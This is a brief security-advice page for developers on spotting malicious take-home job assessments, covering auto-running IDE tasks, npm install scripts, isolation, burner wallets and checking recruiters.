Safety Playbook
Protect your local environment from malicious technical assessments designed to steal credentials.
Check hidden folders
Before opening a cloned repo in your IDE, inspect the hidden folders. Malicious actors use `.vscode/tasks.json` to execute scripts automatically when the folder is opened.
Audit package scripts
Review every script in `package.json`, especially `preinstall` and `postinstall`. A common attack vector hides a download command that runs during npm install.
Use isolated environments
Never run untrusted code directly on your host machine. Use Docker, a Virtual Machine, or cloud environments to isolate the execution from your personal files.
Separate browser profiles
When testing a frontend or connecting a wallet, use a dedicated browser profile with no personal extensions or main wallets attached. Always use burner wallets.
Review via web first
Use GitHub's web interface (press '.' on any repo) to browse the code before pulling it locally. Look for obfuscated code or unfamiliar dependencies.
Verify the employer
Scammers impersonate real companies. Check the email domain carefully and reach out to employees on professional networks to verify the recruiter's identity.
Found a suspicious take-home assignment?
Help protect the community by adding it to our database. It takes less than a minute.